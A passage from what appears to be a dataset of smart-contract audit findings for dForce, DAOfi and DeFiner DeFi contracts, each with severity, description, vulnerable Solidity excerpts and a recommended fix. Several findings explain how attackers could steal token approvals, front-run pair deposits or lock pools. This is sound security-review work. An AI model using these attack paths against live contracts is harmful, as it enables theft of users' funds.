In the event of a chain split, only one of the resulting chains gets to keep the original chain ID and the other will have to use a new one. With the current pattern, a signature will be valid on both chains; if the `DOMAIN_SEPARATOR` is recomputed for every verification, a signature will only be valid on the chain that keeps the original ID — which is probably the intended behavior.\\nRemark\\nThe reason why the not necessarily constant chain ID is part of the supposedly constant `DOMAIN_SEPARATOR` is that EIP-712 predates the introduction of the `CHAINID` opcode. Originally, it was not possible to query the chain ID via opcode, so it had to be supplied to the constructor of a contract by the deployment script.","An obvious fix is to compute the `DOMAIN_SEPARATOR` dynamically in `permit`. However, since a chain split is a relatively unlikely event, it makes sense to compute the `DOMAIN_SEPARATOR` at deployment/initialization time and then check in `permit` whether the current chain ID equals the one that went into the `DOMAIN_SEPARATOR`. If that is true, we proceed as before. If the chain ID has changed, we could (1) just revert, or (2) recompute the `DOMAIN_SEPARATOR` with the new chain ID. 
Solution (1) is probably the easiest and most straightforward to implement, but it should be noted that it makes the `permit` functionality of this contract completely unusable on the new chain.",,"```\\nfunction \\_initialize(\\n string memory \\_name,\\n string memory \\_symbol,\\n uint8 \\_decimals,\\n IControllerInterface \\_controller,\\n IInterestRateModelInterface \\_interestRateModel\\n) internal virtual {\\n controller = \\_controller;\\n interestRateModel = \\_interestRateModel;\\n accrualBlockNumber = block.number;\\n borrowIndex = BASE;\\n flashloanFeeRatio = 0.0008e18;\\n protocolFeeRatio = 0.25e18;\\n \\_\\_Ownable\\_init();\\n \\_\\_ERC20\\_init(\\_name, \\_symbol, \\_decimals);\\n \\_\\_ReentrancyGuard\\_init();\\n\\n uint256 chainId;\\n\\n assembly {\\n chainId := chainid()\\n }\\n DOMAIN\\_SEPARATOR = keccak256(\\n abi.encode(\\n keccak256(\\n ""EIP712Domain(string name,string version,uint256 chainId,address verifyingContract)""\\n ),\\n keccak256(bytes(\\_name)),\\n keccak256(bytes(""1"")),\\n chainId,\\n address(this)\\n )\\n );\\n}\\n```\\n" +iETH.receive() does not support contracts executing during their constructor,low,"`iETH.receive()` requires that the caller is a contract:\\n```\\n/\\*\\*\\n \\* @notice receive ETH, used for flashloan repay.\\n \\*/\\nreceive() external payable {\\n require(\\n msg.sender.isContract(),\\n ""receive: Only can call from a contract!""\\n );\\n}\\n```\\n\\nThis method uses the `extcodesize` of an account to check that the account belongs to a contract. 
However, contracts currently executing their constructor will have an `extcodesize` of 0, and will not be able to use this method.\\nThis is unlikely to cause significant issues, but dForce may want to consider supporting this edge case.",Use `msg.sender != tx.origin` as a more reliable method to detect use by a contract.,,"```\\n/\\*\\*\\n \\* @notice receive ETH, used for flashloan repay.\\n \\*/\\nreceive() external payable {\\n require(\\n msg.sender.isContract(),\\n ""receive: Only can call from a contract!""\\n );\\n}\\n```\\n" +Token approvals can be stolen in DAOfiV1Router01.addLiquidity(),high,"`DAOfiV1Router01.addLiquidity()` creates the desired pair contract if it does not already exist, then transfers tokens into the pair and calls `DAOfiV1Pair.deposit()`. There is no validation of the address to transfer tokens from, so an attacker could pass in any address with nonzero token approvals to `DAOfiV1Router`. This could be used to add liquidity to a pair contract for which the attacker is the `pairOwner`, allowing the stolen funds to be retrieved using `DAOfiV1Pair.withdraw()`.\\n```\\nfunction addLiquidity(\\n LiquidityParams calldata lp,\\n uint deadline\\n) external override ensure(deadline) returns (uint256 amountBase) {\\n if (IDAOfiV1Factory(factory).getPair(\\n lp.tokenBase,\\n lp.tokenQuote,\\n lp.slopeNumerator,\\n lp.n,\\n lp.fee\\n ) == address(0)) {\\n IDAOfiV1Factory(factory).createPair(\\n address(this),\\n lp.tokenBase,\\n lp.tokenQuote,\\n msg.sender,\\n lp.slopeNumerator,\\n lp.n,\\n lp.fee\\n );\\n }\\n address pair = DAOfiV1Library.pairFor(\\n factory, lp.tokenBase, lp.tokenQuote, lp.slopeNumerator, lp.n, lp.fee\\n );\\n\\n TransferHelper.safeTransferFrom(lp.tokenBase, lp.sender, pair, lp.amountBase);\\n TransferHelper.safeTransferFrom(lp.tokenQuote, lp.sender, pair, lp.amountQuote);\\n amountBase = IDAOfiV1Pair(pair).deposit(lp.to);\\n}\\n```\\n",Transfer tokens from `msg.sender` instead of `lp.sender`.,,"```\\nfunction addLiquidity(\\n 
LiquidityParams calldata lp,\\n uint deadline\\n) external override ensure(deadline) returns (uint256 amountBase) {\\n if (IDAOfiV1Factory(factory).getPair(\\n lp.tokenBase,\\n lp.tokenQuote,\\n lp.slopeNumerator,\\n lp.n,\\n lp.fee\\n ) == address(0)) {\\n IDAOfiV1Factory(factory).createPair(\\n address(this),\\n lp.tokenBase,\\n lp.tokenQuote,\\n msg.sender,\\n lp.slopeNumerator,\\n lp.n,\\n lp.fee\\n );\\n }\\n address pair = DAOfiV1Library.pairFor(\\n factory, lp.tokenBase, lp.tokenQuote, lp.slopeNumerator, lp.n, lp.fee\\n );\\n\\n TransferHelper.safeTransferFrom(lp.tokenBase, lp.sender, pair, lp.amountBase);\\n TransferHelper.safeTransferFrom(lp.tokenQuote, lp.sender, pair, lp.amountQuote);\\n amountBase = IDAOfiV1Pair(pair).deposit(lp.to);\\n}\\n```\\n" +The deposit of a new pair can be stolen,high,"To create a new pair, a user is expected to call the same `addLiquidity()` (or the addLiquidityETH()) function of the router contract seen above:\\n```\\nfunction addLiquidity(\\n LiquidityParams calldata lp,\\n uint deadline\\n) external override ensure(deadline) returns (uint256 amountBase) {\\n if (IDAOfiV1Factory(factory).getPair(\\n lp.tokenBase,\\n lp.tokenQuote,\\n lp.slopeNumerator,\\n lp.n,\\n lp.fee\\n ) == address(0)) {\\n IDAOfiV1Factory(factory).createPair(\\n address(this),\\n lp.tokenBase,\\n lp.tokenQuote,\\n msg.sender,\\n lp.slopeNumerator,\\n lp.n,\\n lp.fee\\n );\\n }\\n address pair = DAOfiV1Library.pairFor(\\n factory, lp.tokenBase, lp.tokenQuote, lp.slopeNumerator, lp.n, lp.fee\\n );\\n\\n TransferHelper.safeTransferFrom(lp.tokenBase, lp.sender, pair, lp.amountBase);\\n TransferHelper.safeTransferFrom(lp.tokenQuote, lp.sender, pair, lp.amountQuote);\\n amountBase = IDAOfiV1Pair(pair).deposit(lp.to);\\n}\\n```\\n\\nThis function checks if the pair already exists and creates a new one if it does not. 
After that, the first and only deposit is made to that pair.\\nThe attacker can front-run that call and create a pair with the same parameters (thus, with the same address) by calling the `createPair` function of the `DAOfiV1Factory` contract. By calling that function directly, the attacker does not have to make the deposit when creating a new pair. The initial user will then make the deposit, and the attacker can withdraw those funds.","There are a few factors/bugs that allowed this attack. All or some of them should be fixed:\\nThe `createPair` function of the `DAOfiV1Factory` contract can be called directly by anyone, without making a deposit, and with an arbitrary `router` address as the parameter. The solution could be to allow only the `router` to create a pair.\\nThe `addLiquidity` function checks that the pair does not exist yet. If the pair exists already, a deposit should only be made by the owner of the pair. But in general, a new pair shouldn't be deployed without depositing in the same transaction.\\nThe pair's address does not depend on the owner/creator. 
It might make sense to add that information to the salt.",,"```\\nfunction addLiquidity(\\n LiquidityParams calldata lp,\\n uint deadline\\n) external override ensure(deadline) returns (uint256 amountBase) {\\n if (IDAOfiV1Factory(factory).getPair(\\n lp.tokenBase,\\n lp.tokenQuote,\\n lp.slopeNumerator,\\n lp.n,\\n lp.fee\\n ) == address(0)) {\\n IDAOfiV1Factory(factory).createPair(\\n address(this),\\n lp.tokenBase,\\n lp.tokenQuote,\\n msg.sender,\\n lp.slopeNumerator,\\n lp.n,\\n lp.fee\\n );\\n }\\n address pair = DAOfiV1Library.pairFor(\\n factory, lp.tokenBase, lp.tokenQuote, lp.slopeNumerator, lp.n, lp.fee\\n );\\n\\n TransferHelper.safeTransferFrom(lp.tokenBase, lp.sender, pair, lp.amountBase);\\n TransferHelper.safeTransferFrom(lp.tokenQuote, lp.sender, pair, lp.amountQuote);\\n amountBase = IDAOfiV1Pair(pair).deposit(lp.to);\\n}\\n```\\n" +Incorrect token decimal conversions can lead to loss of funds,high,"The `_convert()` function in `DAOfiV1Pair` is used to accommodate tokens with varying `decimals()` values. There are three cases in which it implicitly returns 0 for any `amount`, the most notable of which is when `token.decimals() == resolution`.\\nAs a result of this, `getQuoteOut()` reverts any time either `baseToken` or `quoteToken` have `decimals == INTERNAL_DECIMALS` (currently hardcoded to 8).\\n`getBaseOut()` also reverts in most cases when either `baseToken` or `quoteToken` have `decimals() == INTERNAL_DECIMALS`. The exception is when `getBaseOut()` is called while `supply` is 0, as is the case in `deposit()`. 
This causes `getBaseOut()` to succeed, returning an incorrect value.\\nThe result of this is that no swaps can be performed in one of these pools, and the `deposit()` function will return an incorrect `amountBaseOut` of `baseToken` to the depositor, the balance of which can then be withdrawn by the `pairOwner`.\\n```\\nfunction \\_convert(address token, uint256 amount, uint8 resolution, bool to) private view returns (uint256 converted) {\\n uint8 decimals = IERC20(token).decimals();\\n uint256 diff = 0;\\n uint256 factor = 0;\\n converted = 0;\\n if (decimals > resolution) {\\n diff = uint256(decimals.sub(resolution));\\n factor = 10 \\*\\* diff;\\n if (to && amount >= factor) {\\n converted = amount.div(factor);\\n } else if (!to) {\\n converted = amount.mul(factor);\\n }\\n } else if (decimals < resolution) {\\n diff = uint256(resolution.sub(decimals));\\n factor = 10 \\*\\* diff;\\n if (to) {\\n converted = amount.mul(factor);\\n } else if (!to && amount >= factor) {\\n converted = amount.div(factor);\\n }\\n }\\n}\\n```\\n","The `_convert()` function should return `amount` when `token.decimals() == resolution`. 
Additionally, implicit return values should be avoided whenever possible, especially in functions that implement complex mathematical operations.\\n`BancorFormula.power(baseN, baseD, _, _)` does not support `baseN < baseD`, and checks should be added to ensure that any call to the `BancorFormula` conforms to the expected input ranges.",,"```\\nfunction \\_convert(address token, uint256 amount, uint8 resolution, bool to) private view returns (uint256 converted) {\\n uint8 decimals = IERC20(token).decimals();\\n uint256 diff = 0;\\n uint256 factor = 0;\\n converted = 0;\\n if (decimals > resolution) {\\n diff = uint256(decimals.sub(resolution));\\n factor = 10 \\*\\* diff;\\n if (to && amount >= factor) {\\n converted = amount.div(factor);\\n } else if (!to) {\\n converted = amount.mul(factor);\\n }\\n } else if (decimals < resolution) {\\n diff = uint256(resolution.sub(decimals));\\n factor = 10 \\*\\* diff;\\n if (to) {\\n converted = amount.mul(factor);\\n } else if (!to && amount >= factor) {\\n converted = amount.div(factor);\\n }\\n }\\n}\\n```\\n" +The swapExactTokensForETH checks the wrong return value,high,"The following lines are intended to check that the amount of tokens received from a swap is greater than the minimum amount expected from this swap (sp.amountOut):\\n```\\nuint amountOut = IWETH10(WETH).balanceOf(address(this));\\nrequire(\\n IWETH10(sp.tokenOut).balanceOf(address(this)).sub(balanceBefore) >= sp.amountOut,\\n 'DAOfiV1Router: INSUFFICIENT\\_OUTPUT\\_AMOUNT'\\n);\\n```\\n\\nInstead, it calculates the difference between the initial receiver's balance and the balance of the router.",Check the intended value.,,"```\\nuint amountOut = IWETH10(WETH).balanceOf(address(this));\\nrequire(\\n IWETH10(sp.tokenOut).balanceOf(address(this)).sub(balanceBefore) >= sp.amountOut,\\n 'DAOfiV1Router: INSUFFICIENT\\_OUTPUT\\_AMOUNT'\\n);\\n```\\n" +"DAOfiV1Pair.deposit() accepts deposits of zero, blocking the pool",medium,"`DAOfiV1Pair.deposit()` is used to 
deposit liquidity into the pool. Only a single deposit can be made, so no liquidity can ever be added to a pool where `deposited == true`. The `deposit()` function does not check for a nonzero deposit amount in either token, so a malicious user that does not hold any of the `baseToken` or `quoteToken` can lock the pool by calling `deposit()` without first transferring any funds to the pool.\\n```\\nfunction deposit(address to) external override lock returns (uint256 amountBaseOut) {\\n require(msg.sender == router, 'DAOfiV1: FORBIDDEN\\_DEPOSIT');\\n require(deposited == false, 'DAOfiV1: DOUBLE\\_DEPOSIT');\\n reserveBase = IERC20(baseToken).balanceOf(address(this));\\n reserveQuote = IERC20(quoteToken).balanceOf(address(this));\\n // this function is locked and the contract can not reset reserves\\n deposited = true;\\n if (reserveQuote > 0) {\\n // set initial supply from reserveQuote\\n supply = amountBaseOut = getBaseOut(reserveQuote);\\n if (amountBaseOut > 0) {\\n \\_safeTransfer(baseToken, to, amountBaseOut);\\n reserveBase = reserveBase.sub(amountBaseOut);\\n }\\n }\\n emit Deposit(msg.sender, reserveBase, reserveQuote, amountBaseOut, to);\\n}\\n```\\n","Require a minimum deposit amount in both `baseToken` and `quoteToken`, and do not rely on any assumptions about the distribution of `baseToken` as part of the security model.",,"```\\nfunction deposit(address to) external override lock returns (uint256 amountBaseOut) {\\n require(msg.sender == router, 'DAOfiV1: FORBIDDEN\\_DEPOSIT');\\n require(deposited == false, 'DAOfiV1: DOUBLE\\_DEPOSIT');\\n reserveBase = IERC20(baseToken).balanceOf(address(this));\\n reserveQuote = IERC20(quoteToken).balanceOf(address(this));\\n // this function is locked and the contract can not reset reserves\\n deposited = true;\\n if (reserveQuote > 0) {\\n // set initial supply from reserveQuote\\n supply = amountBaseOut = getBaseOut(reserveQuote);\\n if (amountBaseOut > 0) {\\n \\_safeTransfer(baseToken, to, amountBaseOut);\\n 
reserveBase = reserveBase.sub(amountBaseOut);\\n }\\n }\\n emit Deposit(msg.sender, reserveBase, reserveQuote, amountBaseOut, to);\\n}\\n```\\n" +Restricting DAOfiV1Pair functions to calls from router makes DAOfiV1Router01 security critical,medium,"The `DAOfiV1Pair` functions `deposit()`, `withdraw()`, and `swap()` are all restricted to calls from the router in order to avoid losses from user error. However, this means that any unidentified issue in the Router could render all pair contracts unusable, potentially locking the pair owner's funds.\\nAdditionally, `DAOfiV1Factory.createPair()` allows any nonzero address to be provided as the `router`, so pairs can be initialized with a malicious `router` that users would be forced to interact with to utilize the pair contract.\\n```\\nfunction deposit(address to) external override lock returns (uint256 amountBaseOut) {\\n require(msg.sender == router, 'DAOfiV1: FORBIDDEN\\_DEPOSIT');\\n```\\n\\n```\\nfunction withdraw(address to) external override lock returns (uint256 amountBase, uint256 amountQuote) {\\n require(msg.sender == router, 'DAOfiV1: FORBIDDEN\\_WITHDRAW');\\n```\\n\\n```\\nfunction swap(address tokenIn, address tokenOut, uint256 amountIn, uint256 amountOut, address to) external override lock {\\n require(msg.sender == router, 'DAOfiV1: FORBIDDEN\\_SWAP');\\n```\\n","Do not restrict `DAOfiV1Pair` functions to calls from `router`, but encourage users to use a trusted `router` to avoid losses from user error. 
If this restriction is kept, consider including the `router` address in the deployment salt for the pair or hardcoding the address of a trusted `router` in `DAOfiV1Factory` instead of taking the `router` as a parameter to `createPair()`.",,"```\\nfunction deposit(address to) external override lock returns (uint256 amountBaseOut) {\\n require(msg.sender == router, 'DAOfiV1: FORBIDDEN\\_DEPOSIT');\\n```\\n" +Pair contracts can be easily blocked,low,"The parameters used to define a unique pair are the `baseToken`, `quoteToken`, `slopeNumerator`, `n`, and `fee`. There is only one accepted value for `n`, and there are eleven accepted values for `fee`. This makes the number of possible “interesting” pools for each token pair somewhat limited, and pools can be easily blocked by front-running deployments and depositing zero liquidity or immediately withdrawing deposited liquidity. Because liquidity can only be added once, these pools are permanently blocked.\\nThe existing mitigation for this issue is to create a new pool with slightly different parameters. This creates significant cost for the creator of a pair, forces them to deploy a pair with sub-optimal parameters, and could potentially block all interesting pools for a token pair.\\nThe salt used to determine unique pair contracts in DAOfiV1Factory.createPair():\\n```\\nrequire(getPair(baseToken, quoteToken, slopeNumerator, n, fee) == address(0), 'DAOfiV1: PAIR\\_EXISTS'); // single check is sufficient\\nbytes memory bytecode = type(DAOfiV1Pair).creationCode;\\nbytes32 salt = keccak256(abi.encodePacked(baseToken, quoteToken, slopeNumerator, n, fee));\\nassembly {\\n pair := create2(0, add(bytecode, 32), mload(bytecode), salt)\\n}\\nIDAOfiV1Pair(pair).initialize(router, baseToken, quoteToken, pairOwner, slopeNumerator, n, fee);\\npairs[salt] = pair;\\n```\\n","Consider adding additional parameters to the salt that defines a unique pair, such as the `pairOwner`. 
Modifying the parameters included in the salt can also be used to partially mitigate other security concerns raised in this report.",,"```\\nrequire(getPair(baseToken, quoteToken, slopeNumerator, n, fee) == address(0), 'DAOfiV1: PAIR\\_EXISTS'); // single check is sufficient\\nbytes memory bytecode = type(DAOfiV1Pair).creationCode;\\nbytes32 salt = keccak256(abi.encodePacked(baseToken, quoteToken, slopeNumerator, n, fee));\\nassembly {\\n pair := create2(0, add(bytecode, 32), mload(bytecode), salt)\\n}\\nIDAOfiV1Pair(pair).initialize(router, baseToken, quoteToken, pairOwner, slopeNumerator, n, fee);\\npairs[salt] = pair;\\n```\\n" +DAOfiV1Router01.removeLiquidityETH() does not support tokens with no return value,low,"While the rest of the system uses the `safeTransfer*` pattern, allowing tokens that do not return a boolean value on `transfer()` or `transferFrom()`, `DAOfiV1Router01.removeLiquidityETH()` throws and consumes all remaining gas if the base token does not return `true`.\\nNote that the deposit in this case can still be withdrawn without unwrapping the Eth using `removeLiquidity()`.\\n```\\nfunction removeLiquidityETH(\\n LiquidityParams calldata lp,\\n uint deadline\\n) external override ensure(deadline) returns (uint amountToken, uint amountETH) {\\n IDAOfiV1Pair pair = IDAOfiV1Pair(DAOfiV1Library.pairFor(factory, lp.tokenBase, WETH, lp.slopeNumerator, lp.n, lp.fee));\\n require(msg.sender == pair.pairOwner(), 'DAOfiV1Router: FORBIDDEN');\\n (amountToken, amountETH) = pair.withdraw(address(this));\\n assert(IERC20(lp.tokenBase).transfer(lp.to, amountToken));\\n IWETH10(WETH).withdraw(amountETH);\\n TransferHelper.safeTransferETH(lp.to, amountETH);\\n}\\n```\\n","Be consistent with the use of `safeTransfer*`, and do not use `assert()` in cases where the condition can be false.",,"```\\nfunction removeLiquidityETH(\\n LiquidityParams calldata lp,\\n uint deadline\\n) external override ensure(deadline) returns (uint amountToken, uint amountETH) {\\n 
IDAOfiV1Pair pair = IDAOfiV1Pair(DAOfiV1Library.pairFor(factory, lp.tokenBase, WETH, lp.slopeNumerator, lp.n, lp.fee));\\n require(msg.sender == pair.pairOwner(), 'DAOfiV1Router: FORBIDDEN');\\n (amountToken, amountETH) = pair.withdraw(address(this));\\n assert(IERC20(lp.tokenBase).transfer(lp.to, amountToken));\\n IWETH10(WETH).withdraw(amountETH);\\n TransferHelper.safeTransferETH(lp.to, amountETH);\\n}\\n```\\n" +Users can withdraw their funds immediately when they are over-leveraged,high,"`Accounts.withdraw` makes two checks before processing a withdrawal.\\nFirst, the method checks that the amount requested for withdrawal is not larger than the user's balance for the asset in question:\\n```\\nfunction withdraw(address \\_accountAddr, address \\_token, uint256 \\_amount) external onlyAuthorized returns(uint256) {\\n\\n // Check if withdraw amount is less than user's balance\\n require(\\_amount <= getDepositBalanceCurrent(\\_token, \\_accountAddr), ""Insufficient balance."");\\n uint256 borrowLTV = globalConfig.tokenInfoRegistry().getBorrowLTV(\\_token);\\n```\\n\\nSecond, the method checks that the withdrawal will not over-leverage the user. The amount to be withdrawn is subtracted from the user's current “borrow power” at the current price. If the user's total value borrowed exceeds this new borrow power, the method fails, as the user no longer has sufficient collateral to support their borrow positions. 
However, this `require` is only checked if a user is not already over-leveraged:\\n```\\n// This if condition is to deal with the withdraw of collateral token in liquidation.\\n// As the amount if borrowed asset is already large than the borrow power, we don't\\n// have to check the condition here.\\nif(getBorrowETH(\\_accountAddr) <= getBorrowPower(\\_accountAddr))\\n require(\\n getBorrowETH(\\_accountAddr) <= getBorrowPower(\\_accountAddr).sub(\\n \\_amount.mul(globalConfig.tokenInfoRegistry().priceFromAddress(\\_token))\\n .mul(borrowLTV).div(Utils.getDivisor(address(globalConfig), \\_token)).div(100)\\n ), ""Insufficient collateral when withdraw."");\\n```\\n\\nIf the user has already borrowed more than their “borrow power” allows, they are allowed to withdraw regardless. This case may arise in several circumstances; the most common being price fluctuation.","Disallow withdrawals if the user is already over-leveraged.\\nFrom the comment included in the code sample above, this condition is included to support the `liquidate` method, but its inclusion creates an attack vector that may allow users to withdraw when they should not be able to do so. Consider adding an additional method to support `liquidate`, so that users may not exit without repaying debts.",,"```\\nfunction withdraw(address \\_accountAddr, address \\_token, uint256 \\_amount) external onlyAuthorized returns(uint256) {\\n\\n // Check if withdraw amount is less than user's balance\\n require(\\_amount <= getDepositBalanceCurrent(\\_token, \\_accountAddr), ""Insufficient balance."");\\n uint256 borrowLTV = globalConfig.tokenInfoRegistry().getBorrowLTV(\\_token);\\n```\\n" +"Users can borrow funds, deposit them, then borrow more Won't Fix",high,"Users may deposit and borrow funds denominated in any asset supported by the `TokenRegistry`. 
Each time a user deposits or borrows a token, they earn FIN according to the difference in deposit / borrow rate indices maintained by `Bank`.\\nBorrowing funds\\nWhen users borrow funds, they may only borrow up to a certain amount: the user's “borrow power.” As long as the user is not requesting to borrow an amount that would cause their resulting borrowed asset value to exceed their available borrow power, the borrow is successful and the user receives the assets immediately. A user's borrow power is calculated in the following function:\\n```\\n/\\*\\*\\n \\* Calculate an account's borrow power based on token's LTV\\n \\*/\\nfunction getBorrowPower(address \\_borrower) public view returns (uint256 power) {\\n for(uint8 i = 0; i < globalConfig.tokenInfoRegistry().getCoinLength(); i++) {\\n if (isUserHasDeposits(\\_borrower, i)) {\\n address token = globalConfig.tokenInfoRegistry().addressFromIndex(i);\\n uint divisor = INT\\_UNIT;\\n if(token != ETH\\_ADDR) {\\n divisor = 10\\*\\*uint256(globalConfig.tokenInfoRegistry().getTokenDecimals(token));\\n }\\n // globalConfig.bank().newRateIndexCheckpoint(token);\\n power = power.add(getDepositBalanceCurrent(token, \\_borrower)\\n .mul(globalConfig.tokenInfoRegistry().priceFromIndex(i))\\n .mul(globalConfig.tokenInfoRegistry().getBorrowLTV(token)).div(100)\\n .div(divisor)\\n );\\n }\\n }\\n return power;\\n}\\n```\\n\\nFor each asset, borrow power is calculated from the user's deposit size, multiplied by the current chainlink price, multiplied and that asset's “borrow LTV.”\\nDepositing borrowed funds\\nAfter a user borrows tokens, they can then deposit those tokens, increasing their deposit balance for that asset. As a result, their borrow power increases, which allows the user to borrow again.\\nBy continuing to borrow, deposit, and borrow again, the user can repeatedly borrow assets. 
Essentially, this creates positions for the user where the collateral for their massive borrow position is entirely made up of borrowed assets.\\nConclusion\\nThere are several potential side-effects of this behavior.\\nFirst, as described in https://github.com/ConsenSys/definer-audit-2021-02/issues/3, the system is comprised of many different tokens, each of which is subject to price fluctuation. By borrowing and depositing repeatedly, a user may establish positions across all supported tokens. At this point, if price fluctuations cause the user's account to cross the liquidation threshold, their positions can be liquidated.\\nLiquidation is a complicated function of the protocol, but in essence, the liquidator purchases a target's collateral at a discount, and the resulting sale balances the account somewhat. However, when a user repeatedly deposits borrowed tokens, their collateral is made up of borrowed tokens: the system's liquidity! As a result, this may allow an attacker to intentionally create a massively over-leveraged account on purpose, liquidate it, and exit with a chunk of the system liquidity.\\nAnother potential problem with this behavior is FIN token mining. When users borrow and deposit, they earn FIN according to the size of the deposit / borrow, and the difference in deposit / borrow rate indices since the last deposit / borrow. By repeatedly depositing / borrowing, users are able to artificially deposit and borrow far more often than normal, which may allow them to generate FIN tokens at will. This additional strategy may make attacks like the one described above much more economically feasible.","Due to the limited time available during this engagement, these possibilities and potential mitigations were not fully explored. 
Definer is encouraged to investigate this behavior more carefully.",,"```\\n/\\*\\*\\n \\* Calculate an account's borrow power based on token's LTV\\n \\*/\\nfunction getBorrowPower(address \\_borrower) public view returns (uint256 power) {\\n for(uint8 i = 0; i < globalConfig.tokenInfoRegistry().getCoinLength(); i++) {\\n if (isUserHasDeposits(\\_borrower, i)) {\\n address token = globalConfig.tokenInfoRegistry().addressFromIndex(i);\\n uint divisor = INT\\_UNIT;\\n if(token != ETH\\_ADDR) {\\n divisor = 10\\*\\*uint256(globalConfig.tokenInfoRegistry().getTokenDecimals(token));\\n }\\n // globalConfig.bank().newRateIndexCheckpoint(token);\\n power = power.add(getDepositBalanceCurrent(token, \\_borrower)\\n .mul(globalConfig.tokenInfoRegistry().priceFromIndex(i))\\n .mul(globalConfig.tokenInfoRegistry().getBorrowLTV(token)).div(100)\\n .div(divisor)\\n );\\n }\\n }\\n return power;\\n}\\n```\\n" +Stale Oracle prices might affect the rates,high,"It's possible that due to network congestion or other reasons, the price that the ChainLink oracle returns is old and not up to date. This is more extreme in lesser known tokens that have fewer ChainLink Price feeds to update the price frequently. The codebase as is, relies on `chainLink().getLatestAnswer()` and does not check the timestamp of the price.\\n```\\n function priceFromAddress(address tokenAddress) public view returns(uint256) {\\n if(Utils.\\_isETH(address(globalConfig), tokenAddress)) {\\n return 1e18;\\n }\\n return uint256(globalConfig.chainLink().getLatestAnswer(tokenAddress));\\n }\\n```\\n","Do a sanity check on the price returned from the oracle. 
If the price is older than a threshold, revert or handle in other means.",,"```\\n function priceFromAddress(address tokenAddress) public view returns(uint256) {\\n if(Utils.\\_isETH(address(globalConfig), tokenAddress)) {\\n return 1e18;\\n }\\n return uint256(globalConfig.chainLink().getLatestAnswer(tokenAddress));\\n }\\n```\\n" +Overcomplicated unit conversions,medium,"There are many instances of unit conversion in the system that are implemented in a confusing way. This could result in mistakes in the conversion and possibly failure in correct accounting. It's been seen in the ecosystem that these type of complicated unit conversions could result in calculation mistake and loss of funds.\\nHere are a few examples:\\n```\\n function getBorrowRatePerBlock(address \\_token) public view returns(uint) {\\n if(!globalConfig.tokenInfoRegistry().isSupportedOnCompound(\\_token))\\n // If the token is NOT supported by the third party, borrowing rate = 3% + U \\* 15%.\\n return getCapitalUtilizationRatio(\\_token).mul(globalConfig.rateCurveSlope()).div(INT\\_UNIT).add(globalConfig.rateCurveConstant()).div(BLOCKS\\_PER\\_YEAR);\\n\\n // if the token is suppored in third party, borrowing rate = Compound Supply Rate \\* 0.4 + Compound Borrow Rate \\* 0.6\\n return (compoundPool[\\_token].depositRatePerBlock).mul(globalConfig.compoundSupplyRateWeights()).\\n add((compoundPool[\\_token].borrowRatePerBlock).mul(globalConfig.compoundBorrowRateWeights())).div(10);\\n }\\n```\\n\\n```\\n compoundPool[\\_token].depositRatePerBlock = cTokenExchangeRate.mul(UNIT).div(lastCTokenExchangeRate[cToken])\\n .sub(UNIT).div(blockNumber.sub(lastCheckpoint[\\_token]));\\n```\\n\\n```\\n return lastDepositeRateIndex.mul(getBlockNumber().sub(lcp).mul(depositRatePerBlock).add(INT\\_UNIT)).div(INT\\_UNIT);\\n```\\n",Simplify the unit conversions in the system. 
This can be done either by using a function wrapper for units to convert all values to the same unit before including them in any calculation or by better documenting every line of unit conversion,,"```\\n function getBorrowRatePerBlock(address \\_token) public view returns(uint) {\\n if(!globalConfig.tokenInfoRegistry().isSupportedOnCompound(\\_token))\\n // If the token is NOT supported by the third party, borrowing rate = 3% + U \\* 15%.\\n return getCapitalUtilizationRatio(\\_token).mul(globalConfig.rateCurveSlope()).div(INT\\_UNIT).add(globalConfig.rateCurveConstant()).div(BLOCKS\\_PER\\_YEAR);\\n\\n // if the token is suppored in third party, borrowing rate = Compound Supply Rate \\* 0.4 + Compound Borrow Rate \\* 0.6\\n return (compoundPool[\\_token].depositRatePerBlock).mul(globalConfig.compoundSupplyRateWeights()).\\n add((compoundPool[\\_token].borrowRatePerBlock).mul(globalConfig.compoundBorrowRateWeights())).div(10);\\n }\\n```\\n" +Commented out code in the codebase,medium,"There are many instances of code lines (and functions) that are commented out in the code base. Having commented out code increases the cognitive load on an already complex system. Also, it hides the important parts of the system that should get the proper attention, but that attention gets to be diluted.\\nThe main problem is that commented code adds confusion with no real benefit. 
Code should be code, and comments should be comments.\\nHere are a few examples of such lines of code; note that there are more.\\n```\\n struct LiquidationVars {\\n // address token;\\n // uint256 tokenPrice;\\n // uint256 coinValue;\\n uint256 borrowerCollateralValue;\\n // uint256 tokenAmount;\\n // uint256 tokenDivisor;\\n uint256 msgTotalBorrow;\\n```\\n\\n```\\n if(token != ETH\\_ADDR) {\\n divisor = 10\\*\\*uint256(globalConfig.tokenInfoRegistry().getTokenDecimals(token));\\n }\\n // globalConfig.bank().newRateIndexCheckpoint(token);\\n power = power.add(getDepositBalanceCurrent(token, \\_borrower)\\n```\\n\\nThere are many usages of `console.log()`, as well as commented-out import statements in most of the contracts\\n```\\n // require(\\n // totalBorrow.mul(100) <= totalCollateral.mul(liquidationDiscountRatio),\\n // ""Collateral is not sufficient to be liquidated.""\\n // );\\n```\\n\\n```\\n // function \\_isETH(address \\_token) public view returns (bool) {\\n // return globalConfig.constants().ETH\\_ADDR() == \\_token;\\n // }\\n\\n // function getDivisor(address \\_token) public view returns (uint256) {\\n // if(\\_isETH(\\_token)) return INT\\_UNIT;\\n // return 10 \\*\\* uint256(getTokenDecimals(\\_token));\\n // }\\n```\\n\\n```\\n // require(\\_borrowLTV != 0, ""Borrow LTV is zero"");\\n require(\\_borrowLTV < SCALE, ""Borrow LTV must be less than Scale"");\\n // require(liquidationThreshold > \\_borrowLTV, ""Liquidation threshold must be greater than Borrow LTV"");\\n```\\n","In many of the above examples, it's not clear if the commented code is for testing or obsolete code (e.g. in the last example, can _borrowLTV == 0?).
All these instances should be reviewed and the system should be fully tested for all edge cases after the code changes.",,```\\n struct LiquidationVars {\\n // address token;\\n // uint256 tokenPrice;\\n // uint256 coinValue;\\n uint256 borrowerCollateralValue;\\n // uint256 tokenAmount;\\n // uint256 tokenDivisor;\\n uint256 msgTotalBorrow;\\n```\\n +Emergency withdrawal code present,medium,"Code and functionality for emergency stop and withdrawal is present in this code base.\\n```\\n // ============================================\\n // EMERGENCY WITHDRAWAL FUNCTIONS\\n // Needs to be removed when final version deployed\\n // ============================================\\n function emergencyWithdraw(GlobalConfig globalConfig, address \\_token) public {\\n address cToken = globalConfig.tokenInfoRegistry().getCToken(\\_token);\\n// rest of code\\n```\\n\\n```\\n function emergencyWithdraw(address \\_token) external onlyEmergencyAddress {\\n SavingLib.emergencyWithdraw(globalConfig, \\_token);\\n }\\n```\\n\\n```\\n// rest of code\\n address payable public constant 